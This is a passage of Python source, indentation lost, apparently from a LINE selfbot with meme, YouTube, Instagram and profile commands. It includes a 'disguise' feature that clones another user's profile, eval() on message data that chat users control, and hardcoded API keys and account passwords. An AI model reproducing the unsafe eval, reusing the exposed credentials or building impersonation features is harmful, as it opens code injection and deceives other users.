except:self.sendMessage(msg.to,' 「 Water Color 」\nType: Image Generator\nStatus: Error Proses Image..♪\nImportant: Please Send the image again')
if kuciyose['MakeMeme'] == True:
try:
path = self.downloadFileURL('https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id, 'path','dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
make_meme(kuciyose['MakeMemeText1'], kuciyose['MakeMemeText2'], 'dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
self.sendImage(msg.to,'dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
os.remove('dataSeen/%s.jpg' % kuciyose['MakeMemeText1'])
kuciyose['MakeMeme'] = False
except:
self.sendMessage(msg.to,' 「 Meme 」\nType: Meme Generator\nStatus: Error Proses Image..♪\nImportant: Please Send the image again')
if wait["Addimage"] == True:
try:
url = 'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id
try:
if msg.contentMetadata != {}:
wait["Images"][wait["Img"]] = 'dataSeen/%s.gif' % wait["Img"];path = self.downloadObjectMsg(msg.id,'path','dataSeen/%s.gif' % wait["Img"],True)
except:wait["Images"][wait["Img"]] = 'dataSeen/%s.jpg' % wait["Img"];path = self.downloadFileURL(url, 'path','dataSeen/%s.jpg' % wait["Img"])
self.sendMessage(msg.to, " 「 Picture 」\nType: Add Picture\nStatus: Success Add Picture♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["Img"] = {}
wait["Addimage"] = False
if msg.contentType == 7:
a = self.shop.getProduct(packageID=int(msg.contentMetadata['STKPKGID']), language='ID', country='ID')
if wait["Addsticker"] == True:
wait["Sticker"][wait["Img"]] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["Img"] = {}
wait["Addsticker"] = False
if msg.to in wait["GROUP"]['AR']['S']:
if wait["GROUP"]['AR']['S'][msg.to]['AP'] == True:
wait["GROUP"]['AR']['S'][msg.to]['Sticker'] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Autorespon Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["GROUP"]['AR']['S'][msg.to]['AP'] = False
if msg.to in wait["GROUP"]['WM']['S']:
if wait["GROUP"]['WM']['S'][msg.to]['AP'] == True:
wait["GROUP"]['WM']['S'][msg.to]['Sticker'] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Welcome Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["GROUP"]['WM']['S'][msg.to]['AP'] = False
if msg.to in wait["GROUP"]['LM']['S']:
if wait["GROUP"]['LM']['S'][msg.to]['AP'] == True:
wait["GROUP"]['LM']['S'][msg.to]['Sticker'] = msg.contentMetadata
self.sendMessage(msg.to, " 「 Leave Sticker 」\nName: "+a.title+"\nSTKID: "+msg.contentMetadata['STKID']+"\nSTKPKGID: "+msg.contentMetadata['STKPKGID']+"\nSTKVER: "+msg.contentMetadata['STKVER'])
wait["GROUP"]['LM']['S'][msg.to]['AP'] = False
if msg.contentType == 13:
self.adityeksekusidata(msg,wait)
if msg.to in wait["kitsunecontact"]:
s=msg.contentMetadata["mid"];a = self.getContact(s);zxc = " 「 Contact 」\nName: @!\n\nMid: "+s+"\n\nStatus Message:\n"+a.statusMessage
self.sendMention(msg.to, zxc,'', [s])
def set(self,msg,wait,kuciyose):
md = " 「 About 」\nSettings:"
if wait["setkey"] == '': md+="\n- Key: [Off]"
else: md+="\n- Key: "+wait["setkey"]
md+="\n\nGroup Settings:"
if msg.to in wait["GROUP"]['AM']['AP']:md+="\n- Auto Respon: [On]"
else:md+="\n- Auto Respon: [Off]"
if msg.to in wait["GROUP"]['WM']['AP']:md+="\n- Welcome MSG: [On]"
else:md+="\n- Welcome MSG: [Off]"
if msg.to in wait["GROUP"]['LM']['AP']:md+="\n- Leave MSG: [On]"
else:md+="\n- Leave MSG: [Off]"
try:
if wait['tos'][msg.to]['setset'] == True:md+="\n- Unsend Detect: [On]"
else:md+="\n- Unsend Detect: [Off]"
except:
wait['tos'][msg.to] = {'setset':False}
if wait['tos'][msg.to]['setset'] == True:md+="\n- Unsend Detect: [On]"
else:md+="\n- Unsend Detect: [Off]"
if msg.to in wait["setTimess"]:md+="\n- ChangeDP Group: [On]"
else:md+="\n- ChangeDP Group: [Off]"
md+="\n\nGenerator:"
if kuciyose['MakeMeme'] == True:md+="\n- Meme Generator: [On]"
else:md+="\n- Meme Generator: [Off]"
if kuciyose['MakeWaterColor'] == True:md+="\n- Image Watercolor: [On]"
else:md+="\n- Image Watercolor: [Off]"
if kuciyose['DrawImage'] == True:md+="\n- Image Drawing: [On]"
else:md+="\n- Image Drawing: [Off]"
self.sendMessage(msg.to,md)
def imageGenerate(self,msg,wait):
path = self.downloadFileURL('https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id, 'path','dataSeen/s.jpg')
r=requests.post(url="http://api.ntcorp.us/storage/make", data={'category':'kolorikolori',"submit": " "},files={'file': open(path,'rb')})
data = r.json()
self.sendImageWithURL(msg.to,'{}{}'.format(wait,self.ub64("http://api.ntcorp.us/storage/get/{}".format(data["result"]["id"]))))
def backupmyprofile(self,to,wait):
hh = self.profile.mid
self.updateProfileAttribute(2, wait['talkblacklist']['L'])
self.updateProfileAttribute(16, wait['talkblacklist']['U'])
path = self.downloadFileURL("http://dl.profile.line-cdn.net/"+wait['talkblacklist']['O'], 'path')
self.updateProfilePicture(path)
self.updateProfileCoverById(wait['talkblacklist']['S'])
self.sendMessage(to,"Sukses Backup\nDisplayName:" + wait['talkblacklist']['L'] + "\n「 Status 」\n" + wait['talkblacklist']['U'])
try:
self.sendImageWithURL(to,"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'Profile')
except Exception as e:
self.sendMessage(to," 「 Auto Respons 」\n"+str(e))
def setbackupprofile(self,to,wait):
hh = self.profile.mid
S = self.getProfileCoverId(hh)
L = self.getProfile().displayName;U = self.getProfile().statusMessage;O = self.getProfile().picturePath;self.sendMessage(to," 「 Backup Profil 」\nSukses Setdefault\nDisplayName:" + self.getProfile().displayName + "\n「Status 」\n" + self.getProfile().statusMessage + "\n「Picture 」")
wait['talkblacklist'] = {'L':L,'U':U,'O':O,'S':S}
me = self.getProfile()
self.sendImageWithURL(to,"http://dl.profile.line-cdn.net/" + me.picturePath,'Profile')
def waktu(self,secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def restart_program(self):
os.system('clear')
python = sys.executable
os.execl(python, python, * sys.argv)
"""Message"""
def sendMention(self,to, text="",ps='', mids=[]):
arrData = ""
arr = []
mention = "@ADIT GANTENG "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ''
h = ''
for mid in range(len(mids)):
h+= str(texts[mid].encode('unicode-escape'))
textx += str(texts[mid])
if h != textx:slen = len(textx)+h.count('U0');elen = len(textx)+h.count('U0') + 13
else:slen = len(textx);elen = len(textx) + 13
arrData = {'S':str(slen), 'E':str(elen), 'M':mids[mid]}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ''
slen = len(textx)
elen = len(textx) + 18
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
self.sendMessage(to, textx, {'AGENT_LINK': 'line://ti/p/~{}'.format(self.profile.userid),'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'AGENT_NAME': ps,'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def templatefoot(self,link,AI,AN):
a={'AGENT_LINK': link,
'AGENT_ICON': AI,
'AGENT_NAME': AN}
return a
def igsearch(self,msg,wait):
to = msg.to
msg.text = self.mycmd(msg.text,wait)
text = msg.text.split(' ')[1]
if len(msg.text.split(' ')) == 2:
try:
r = requests.get("http://rahandiapi.herokuapp.com/instainfo/"+msg.text.split(' ')[1]+"?key=betakey")
data = r.json()
a=" 「 Instagram 」\nType: Search User Instagram"
a+="\nName : "+str(data['result']['name'])
a+="\nBiography :\n "+str(data['result']['bio'])
a+="\nFollower : "+humanize.intcomma(data['result']['follower'])
a+="\nFollowing : "+humanize.intcomma(data['result']['following'])
a+="\nMedia : "+humanize.intcomma(data['result']['mediacount'])
a+="\nPrivate : "+str(data['result']['private'])
a+= "\nUsage:%s instagram %s num" %(wait["setkey"], str(text))
self.sendImageWithURL(to,data['result']['url'],str(data['result']['name']))
self.sendMessage(to,a, self.templatefoot('https://www.instagram.com/{}/'.format(data['result']['username']),'https://3xl39023n0uyvr5xx1gc1btk-wpengine.netdna-ssl.com/wp-content/uploads/2015/10/element-social-circle-instagram.png',str(data['result']['name'])))
except:
return self.sendMessage(to,"Status: 404\nReason: Instagram {} tidak ditemukan".format(text))
if len(msg.text.split(' ')) == 3:
try:
data1 = self.adityarequestweb('http://rahandiapi.herokuapp.com/instapost/{}/{}?key=betakey'.format(msg.text.split(' ')[1],msg.text.split(' ')[2]))
try:
if data1['media']['caption'] == '':a = ''
else:a = 'Caption: {}'.format(data1['media']['caption'])
a+="\nLikes : "+humanize.intcomma(data1['media']['like_count'])
try:
url = data1['media']['url']
if '.mp4' in url:
try:
self.sendVideoWithURL(to,url)
except:self.sendMessage(to,'Video Gagal Dimuat Silahkan Coba Kembali')
else:
self.sendImageWithURL(to,url,'Post IG')
except:
url = data1['media']['url']
if '.mp4' in url:
try:
self.sendVideoWithURL(to,url)
except:self.sendMessage(to,'Video Gagal Dimuat Silahkan Coba Kembali')
else:
b = []
for hgd in range(0,len(data1['media']['url'])):
self.sendImageWithURL(to,data1['media']['url'][hgd]['url'],'Post Ig')
self.sendMessage(to,a, self.templatefoot('https://www.instagram.com/{}/'.format(msg.text.split(' ')[1]),'https://3xl39023n0uyvr5xx1gc1btk-wpengine.netdna-ssl.com/wp-content/uploads/2015/10/element-social-circle-instagram.png',str(msg.text.split(' ')[1])))
except:
return self.sendMessage(to," 「 Instagram 」\nStatus: 404\nReason: Post or Username I'cant found")
except Exception as e:
ee = traceback.format_exc()
return self.sendMessage(to,'{}'.format(e))
def ub64(self,url):hasil = base64.b64encode(url.encode());return hasil.decode('utf-8')
def makewatercolor(self,msg,wait,kuciyose):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("watercolor "):
if msg.text.split(' ')[1] == 'on':kuciyose['MakeWaterColor'] = True;return self.sendMessage(msg.to,' 「 Water Color 」\nType: Image Generator\nStatus: Send the image....')
try:
if 'http://' in msg.text:
self.sendImageWithURL(msg.to,'http://ari-api.herokuapp.com/watercolor?type=2&rancol=on&url={}'.format(self.ub64(self.adityasplittext(msg.text.lower()))))
except Exception as e:
self.sendMessage(msg.to,str(e))
def makedrawingimage(self,msg,wait,kuciyose):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("drawimage "):
if msg.text.split(' ')[1] == 'on':kuciyose['DrawImage'] = True;return self.sendMessage(msg.to,' 「 Drawing 」\nType: Image Generator\nStatus: Send the image....')
try:
if 'http://' in msg.text:
self.sendImageWithURL(msg.to,'http://ari-api.herokuapp.com/drawing?url={}'.format(self.ub64(self.adityasplittext(msg.text.lower()))))
except Exception as e:
self.sendMessage(msg.to,str(e))
def makememe(self,msg,wait,kuciyose):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("meme "):
kitsunesplit = self.adityasplittext(msg.text.lower()).split("|")
if len(kitsunesplit) >= 2:
try:
try:
getTemplate=self.get_memes()[int(kitsunesplit[2])-1]['id']
genMeme=self.imgflipMeme(kitsunesplit[0],kitsunesplit[1],getTemplate,"impact")
except:
getTemplate=self.get_memes()[int(kitsunesplit[1])-1]['id']
genMeme=self.imgflipMeme(kitsunesplit[0],'',getTemplate,"impact")
self.sendImageWithURL(msg.to,genMeme['url'],'Meme Generator')
except:
kuciyose['MakeMeme'] = True;kuciyose['MakeMemeText1'] = kitsunesplit[0];kuciyose['MakeMemeText2'] = kitsunesplit[1]
self.sendMessage(msg.to,' 「 Meme 」\nType: Meme Generator\nStatus: Send the image....')
def imgflipMeme(self,upper_text,lower_text,template_id,font="impact"):
username = "kopisusu"
password = "kopisusu27"
text0 = upper_text
text1 = lower_text
url = "https://api.imgflip.com/caption_image"
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
payload = {'username':username, 'password':password, 'template_id':template_id, 'text0':text0, 'text1':text1, 'font':font}
req = requests.post(url, data=payload)
req.raise_for_status()
response = req.json()
if response['success']:
return response['data']
else:
raise RuntimeError("Imgflip returned error message: " + response['error_message'])
def memelist(self,msg,wait):
getTemplate=self.get_memes()
listtemp="List Template Meme:"
for i in range(0,100):
listtemp += "\n"+str(i+1) + ". " + getTemplate[i]['name']
listtemp += "\nType %smeme txt|text|num" %(wait["setkey"])
self.sendMessage(msg.to,listtemp)
def get_memes(self):
url = 'https://api.imgflip.com/get_memes'
r = requests.get(url)
r.raise_for_status()
response = r.json()
if response['success']:
return response['data']['memes']
else:
raise RuntimeError("Imgflip returned error message: " + response['error_message'])
def youtubelist(self,msg,wait):
kolor = msg.text
msg.text = self.mycmd(msg.text,wait)
cmk = msg.text.lower()
kitsunesplit = self.adityasplittext(msg.text.lower(),'s').split("|")
a = self.adityarequestweb("https://www.googleapis.com/youtube/v3/search?part=snippet&maxResults=25&q="+kitsunesplit[0]+"&type=video&key=AIzaSyAF-_5PLCt8DwhYc7LBskesUnsm1gFHSP8")
to = msg.to
kk = random.randint(0,999)
ditkey = ''
if msg.text.lower().startswith('youtube info '):
if(len(kitsunesplit) == 1 or len(kitsunesplit) == 2):self.sendMessage(to,' 「 Youtube 」\nWaiting....')
if(len(kitsunesplit) == 1):dfghj = self.adityasplittext(msg.text,'s');hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+self.adityasplittext(msg.text,'s'))
if(len(kitsunesplit) == 2):dfghj = 'https://www.youtube.com/watch?v='+a["items"][int(kitsunesplit[1])-1]["id"]['videoId'];hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfghj)
meta = hs['result']
if meta['description'] == '':hjk = ''
else:hjk = '\nDescription:\n{}'.format(meta['description'])
t = ' 「 Youtube 」\nTitle: {}{}\n\nLike: {} Dislike: {}\nViewers: {}'.format(meta['title'],hjk,humanize.intcomma(meta['likes']),humanize.intcomma(meta['dislikes']),humanize.intcomma(meta['viewcount']))
self.sendMessage(to,t, self.templatefoot(dfghj,'https://cdn3.iconfinder.com/data/icons/follow-me/256/YouTube-512.png',meta['title']))
self.sendImageWithURL(to,meta['thumbnail'],meta['title'])
if msg.text.lower().startswith('youtube download '):
if len(kitsunesplit) == 1:
with youtube_dl.YoutubeDL({}) as ydl:
dfg = self.adityasplittext(kolor,'s').replace('youtu.be/','youtube.com/watch?v=').replace('download ','')
meta = ydl.extract_info(dfg, download=False)
self.sendImageWithURL(to,meta['thumbnail'])
try:
data1 = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfg)
a= " 「 LINK DL 」\nType: Youtube Video\n"
a+= "\nTitle: " + str(data1["result"]['title'])
a+= "\nDuration: " + str(data1["result"]['duration'])
a+= "\nAuthor: "+str(data1["result"]['author'])
a+= "\nLike: "+humanize.intcomma(data1["result"]['likes'])
if data1["result"]['videolist'] != []:
a+= "\n\n 「 Video 」"
no = 0
for music in data1["result"]['videolist']:
no +=1
a+= '\n '+str(no)+'. '+music['resolution']+' '+music['extension']+' Size: '+music['size']
a+= '\n '+music['url']
if data1["result"]['audiolist'] != []:
a+= "\n\n 「 Audio 」"
nos = 0
for musics in data1["result"]['audiolist']:
nos +=1
a+= '\n '+str(nos)+'. '+musics['resolution']+' '+musics['extension']+' Size: '+musics['size']
a+= '\n '+musics['url']
self.sendMessage(to,str(a))
except:
self.sendMessage(to,'Error 404')
if len(kitsunesplit) == 2:
with youtube_dl.YoutubeDL({}) as ydl:
meta = ydl.extract_info('https://youtube.com/watch?v={}'.format(a["items"][int(kitsunesplit[1])-1]["id"]['videoId']), download=False)
self.sendImageWithURL(to,meta['thumbnail'])
adit = str(a["items"][int(kitsunesplit[1])-1]["id"]['videoId'])
try:
data1 = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q=https://www.youtube.com/watch?v='+adit)
a= " 「 LINK DL 」\nType: Youtube Video\n"
a+= "\nTitle: " + str(data1["result"]['title'])
a+= "\nDuration: " + str(data1["result"]['duration'])
a+= "\nAuthor: "+str(data1["result"]['author'])
a+= "\nLike: "+humanize.intcomma(data1["result"]['likes'])
if data1["result"]['videolist'] != []:
a+= "\n\n 「 Video 」"
no = 0
for music in data1["result"]['videolist']:
no +=1
a+= '\n '+str(no)+'. '+music['resolution']+' '+music['extension']+' Size: '+music['size']
a+= '\n '+music['url']
if data1["result"]['audiolist'] != []:
a+= "\n\n 「 Audio 」"
nos = 0
for musics in data1["result"]['audiolist']:
nos +=1
a+= '\n '+str(nos)+'. '+musics['resolution']+' '+musics['extension']+' Size: '+musics['size']
a+= '\n '+musics['url']
self.sendMessage(to,str(a))
except:
self.sendMessage(to,'Error 404')
if(cmk.startswith("youtube video ") or cmk.startswith("youtube audio ")):
if len(kitsunesplit) == 1:dfghj = self.adityasplittext(kolor,'s').replace('youtu.be/','youtube.com/watch?v=').replace('video ','').replace('audio ','');hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfghj)
if len(kitsunesplit) == 2:dfghj = 'https://www.youtube.com/watch?v='+a["items"][int(kitsunesplit[1])-1]["id"]['videoId'];hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfghj)
if(cmk.startswith("youtube audio ")):sddd = [a['url'] for a in hs["result"]['audiolist'] if a['extension'] == 'm4a'];ghj= 'mp3';sdd = hs["result"]['videolist'][len(hs["result"]['audiolist'])-1]
if(cmk.startswith("youtube video ")):sdd = hs["result"]['videolist'][len(hs["result"]['videolist'])-1];ghj = sdd['extension']
hhhh = ' 「 Youtube 」\nJudul: {}\nDuration: {}\nEx: {}.{} {}\nSize: {}\nStatus: Waiting... For Upload'.format(hs['result']['title'],hs['result']['duration'],hs['result']['title'],ghj,sdd['resolution'],sdd['size'])
self.sendMessage(msg.to,hhhh, self.templatefoot('{}'.format(dfghj),'https://cdn3.iconfinder.com/data/icons/follow-me/256/YouTube-512.png',hs['result']['title']))
if(cmk.startswith("youtube audio ")):self.sendAudioWithURL(to,sddd[0])
if(cmk.startswith("youtube video ")):self.sendVideoWithURL(to,sdd['url'])
if msg.text.lower().startswith("youtube search "):
if a["items"] != []:
no = 0
ret_ = "╭──「 Youtube 」\n│Type: Youtube Video"
for music in a["items"]:
no += 1
asd = "\n│{}. {}".format(no,music['snippet']['title'])
if no == len(a["items"]):ss='╰'
else:ss='│'
if len(asd) >= 30:
if no == len(a["items"]):ghj = ''
else:ghj = "\n{} {}".format(ss,music['snippet']['title'][30:])
ret_ +="\n{}{}. {}{}".format(ss,no,music['snippet']['title'][:31],ghj)
else:ret_ += "\n{}{}. {}".format(ss,no,music['snippet']['title'])
self.sendMessage(to,ret_)
else:
self.sendMessage(to,"Type: Search Youtube Video\nStatus: "+str(self.adityasplittext(msg.text,'s'))+" not found")
def adityarequestweb(self,url):
r = requests.get("{}".format(url))
data = r.text
data = json.loads(data)
return data
def GroupPost(self,msg,wait):
to = msg.to
data = self.getGroupPost(to)
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'get note':
if data['result'] != []:
try:
no = 0
b = []
a = " 「 Groups 」\nGet Note"
for i in data['result']['feeds']:
b.append(i['post']['userInfo']['writerMid'])
try:
for aasd in i['post']['contents']['textMeta']:b.append(aasd['mid'])
except:pass
no += 1
gtime = i['post']['postInfo']['createdTime']
try:g = i['post']['contents']['text'].replace('@','@!')
except:g="None"
if no == 1:sddd = '\n'
else:sddd = '\n\n'
a +="{}{}. Penulis : @!\nDescription: {}\nTotal Like: {}\nCreated at: {}".format(sddd,no,g,i['post']['postInfo']['likeCount'],humanize.naturaltime(datetime.fromtimestamp(gtime/1000)))
a +="Status: Success Get "+str(data['result']['homeInfo']['postCount'])+" Note"
self.sendMention(to,a,'',b)
except Exception as e:
return self.sendMessage(to,"「 Auto Respond 」\n"+str(e))
if msg.text.lower().startswith('get note '):
try:
music = data['result']['feeds'][int(msg.text.split(' ')[2]) - 1]
b = [music['post']['userInfo']['writerMid']]
try:
for a in music['post']['contents']['textMeta']:b.append(a['mid'])
except:pass
try:
g= "\n\nDescription:\n"+str(music['post']['contents']['text'].replace('@','@!'))
except:
g=""
a="\n Total Like: "+str(music['post']['postInfo']['likeCount'])
a +="\n Total Comment: "+str(music['post']['postInfo']['commentCount'])
gtime = music['post']['postInfo']['createdTime']
a +="\n Created at: "+str(humanize.naturaltime(datetime.fromtimestamp(gtime/1000)))
a += g
zx = ""
zxc = " 「 Groups 」\nGet Note\n Penulis : @!"+a
try:
self.sendMention(to,zxc,'',b)
except Exception as e:
self.sendMessage(to, str(e))
try:
for c in music['post']['contents']['media']:
params = {'userMid': self.getProfile().mid, 'oid': c['objectId']}
path = self.server.urlEncode(self.server.LINE_OBS_DOMAIN, '/myhome/h/download.nhn', params)
if 'PHOTO' in c['type']:
try:
self.sendImageWithURL(to,path,'POST')
except:pass
else:
pass
if 'VIDEO' in c['type']:
try:
self.sendVideoWithURL(to,path)
except:pass
else:
pass
except:
pass
except Exception as e:
return self.sendMessage(to," 「 Auto Respons 」\n"+str(e))
def disguiseons(self,msg):
to=msg.to
if 'MENTION' in msg.contentMetadata.keys()!= None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
self.cloneContactProfile(key1)
group = self.getContact(key1);contact = "http://dl.profile.line-cdn.net/" + group.pictureStatus;self.sendImageWithURL(to,contact,'DISGUISE')
self.sendMention(to, ' 「 Copy Profile 」\n- Target: @!\n- Status: Success Copy profile♪','',[key1])
def fancynamehelp(self,wait,dd):
if 'timer' not in wait['talkban']:
wait['talkban']['timer'] = 60
if 'name' not in wait['talkban']:
wait['talkban']['name'] = self.getProfile().displayName
try:
if wait['timeline'] == False:wait['timeline'] = []
except:pass
if wait['ChangeCover'] == True:d = '\n│State: ON\n│Timer: {}second'.format(wait['talkban']['timer'])
else:d = '\n│State: OFF'
if wait["timeline"] == []:
a='None'
else:
a = ""
for b in wait["timeline"]:
a+= '\n│'+b
return "┌───「 Fancy Name 」───────\n│Backup Name: "+dd+"\n│FancyName Set:"+a+d+"\n│ | Command | \n│Set Name\n│ Key: "+wait["setkey"].title()+" fancyname set [enter|name]\n│Set Time\n│ Key: "+wait["setkey"].title()+" fancyname on [time]\n└────────────"
def lagulagu(self,wait):return "╭───「 Music 」─\n│ | Command | \n│Search Music\n│ Key: "+wait["setkey"].title()+" soundcloud [query]\n│Detail Music\n│ Key: "+wait["setkey"].title()+" soundcloud [query|num]\n│Lyric\n│ Key: "+wait["setkey"].title()+" lyric [judul]\n╰──────"
def copy(self,wait):return "╭───「 Disguise 」─\n│ | Command | \n│Disguise ON\n│ Key: "+wait["setkey"].title()+" disguise on [@]\n│Disguise OFF\n│ Key: "+wait["setkey"].title()+" disguise off\n│Disguise Setdefault\n│ Key: "+wait["setkey"].title()+" disguise setdefault\n╰──────"
def steal(self,wait):return "╭───「 Steal 」─\n│ | Command | \n│Get Profile Picture\n│ Key: "+wait["setkey"].title()+" steal pp [@]\n│Get Cover Picture\n│ Key: "+wait["setkey"].title()+" steal cover [@]\n│Get ID\n│ Key: "+wait["setkey"].title()+" getid, getid [@|num]\n╰──────"
def movie(self,wait):return "╭───「 Movie 」─\n│ | Command | \n│Search Movie\n│ Key: "+wait["setkey"].title()+" movie [query]\n│Search Detail Movie\n│ Key: "+wait["setkey"].title()+" movie [query|1]\n╰──────"
def keep(self,wait):return "╭───「 MEME 」─\n│ | Command | \n│List\n│ Key: "+wait["setkey"].title()+" memelist\n│MemeGen\n│ Key: "+wait["setkey"].title()+" meme [text|text|num]\n│ Key: "+wait["setkey"].title()+" meme [text|num]\n│ Key: "+wait["setkey"].title()+" meme [text|text]\n╰──────"
def image(self,wait):return "╭───「 Image 」─\n│ | Command | \n│Google Image\n│ Key: "+wait["setkey"].title()+" gimage [query]\n│Artstation Image\n│ Key: "+wait["setkey"].title()+" artimage [query]\n│Image Generator\n│ Water Color\n│ Key: "+wait["setkey"].title()+" watercolor [url]\n│ Key: "+wait["setkey"].title()+" watercolor on\n│ Drawing Image\n│ Key: "+wait["setkey"].title()+" drawimage [url]\n│ Key: "+wait["setkey"].title()+" drawimage on\n╰──────"
def kaskus(self,wait):return "╭───「 Kaskus 」─\n│ | Command | \n│Hot Thread\n│ Key: "+wait["setkey"].title()+" kaskus ht\n│Hot Thread Detail\n│ Key: "+wait["setkey"].title()+" kaskus ht [num]\n╰──────"
def instagram(self,wait):return "╭───「 Instagram 」─\n│ | Command | \n│Search Instagram\n│ Key: "+wait["setkey"].title()+" instagram [username]\n│Search Instagram Post\n│ Key: "+wait["setkey"].title()+" instagram [username] [num]\n│Search Instagram Story\n│ Key: "+wait["setkey"].title()+" instastory [username] [num]\n╰──────"
def youtube(self,wait):return "╭───「 Youtube 」─\n│ | Command | \n│Search\n│ Key: "+wait["setkey"].title()+" youtube search [query]\n│MP4\n│ Key: "+wait["setkey"].title()+" youtube video [query|num]\n│ Key: "+wait["setkey"].title()+" youtube video [url]\n│Downloader\n│ Key: "+wait["setkey"].title()+" youtube download [query|num]\n│ Key: "+wait["setkey"].title()+" youtube download [url]\n│MP3\n│ Key: "+wait["setkey"].title()+" youtube audio [query|num]\n│ Key: "+wait["setkey"].title()+" youtube audio [url]\n│Info\n│ Key: "+wait["setkey"].title()+" youtube info [query|num]\n│ Key: "+wait["setkey"].title()+" youtube info [url]\n╰──────"
def media(self,wait):return "╭─「 Media 」─\n│ | Command | \n│Qur'an\n│ Key: "+wait["setkey"].title()+" qur'an\n│Word\n│ Key: "+wait["setkey"].title()+" word\n│Image\n│ Key: "+wait["setkey"].title()+" image\n│Youtube\n│ Key: "+wait["setkey"].title()+" youtube\n│Music\n│ Key: "+wait["setkey"].title()+" music\n│Instagram\n│ Key: "+wait["setkey"].title()+" instagram\n│Kaskus\n│ Key: "+wait["setkey"].title()+" kaskus\n│Anime\n│ Key: "+wait["setkey"].title()+" anime\n│Webtoon\n│ Key: "+wait["setkey"].title()+" webtoon\n│Meme\n│ Key: "+wait["setkey"].title()+" meme\n╰──────"
def quran(self,wait):return "╭─「 Qur'an 」─\n│ | Command | \n│Daftar Surah\n│ key: "+wait["setkey"].title()+" quranlist\n│Get Ayat Surah\n│ key: "+wait["setkey"].title()+" qur'an [numsurah]\n│ key: "+wait["setkey"].title()+" qur'an [numsurah] [1|<|>|-]\n╰──────"
def webtoon(self,wait):return "╭─「 Webtoon 」─\n│ | Command | \n│Drama\n│ key: "+wait["setkey"].title()+" webtoon drama\n│ key: "+wait["setkey"].title()+" webtoon drama [num]\n│Fantasi\n│ key: "+wait["setkey"].title()+" webtoon fantasi\n│ key: "+wait["setkey"].title()+" webtoon fantasi [num]\n│Comedy\n│ key: "+wait["setkey"].title()+" webtoon comedy\n│ key: "+wait["setkey"].title()+" webtoon comedy [num]\n│Slice of Life\n│ key: "+wait["setkey"].title()+" webtoon sol\n│ key: "+wait["setkey"].title()+" webtoon sol [num]\n│Romance\n│ key: "+wait["setkey"].title()+" webtoon romance\n│ key: "+wait["setkey"].title()+" webtoon romancethriller [num]\n│Thriller\n│ key: "+wait["setkey"].title()+" webtoon thriller\n│ key: "+wait["setkey"].title()+" webtoon thriller [num]\n│Horror\n│ key: "+wait["setkey"].title()+" webtoon horror\n│ key: "+wait["setkey"].title()+" webtoon horror [num]\n╰──────"
def anime(self,wait):return "╭─「 Anime 」─\n│ | Command | \n│Anime List\n│ key: "+wait["setkey"].title()+" anilist\n│ key: "+wait["setkey"].title()+" anilist [num]\n│ key: "+wait["setkey"].title()+" anilist [num] [numepisode]\n│Mangakyo\n│ Cek Page Manga\n│ key: "+wait["setkey"].title()+" mangakyo \n│ key: "+wait["setkey"].title()+" mangakyo page [num]\n╰──────"
def word(self,wait):return "╭─「 Word 」─\n│ | Command | \n│Urban\n│ Key: "+wait["setkey"].title()+" urban [query]\n│KBBI\n│ Key: "+wait["setkey"].title()+" kbbi [query]\n│Wikipedia\n│ Key: "+wait["setkey"].title()+" wikipedia [query]\n╰──────"
def autoreadon(self,wait):return " 「 Auto Read 」\nUsage:"+wait["setkey"]+" autoread on <trigger>\nTrigger:\n1 - Personal\n2 - Group"
def autoreadoff(self,wait):return " 「 Auto Read 」\nUsage:"+wait["setkey"]+" autoread off <trigger>\nTrigger:\n1 - Personal\n2 - Group"
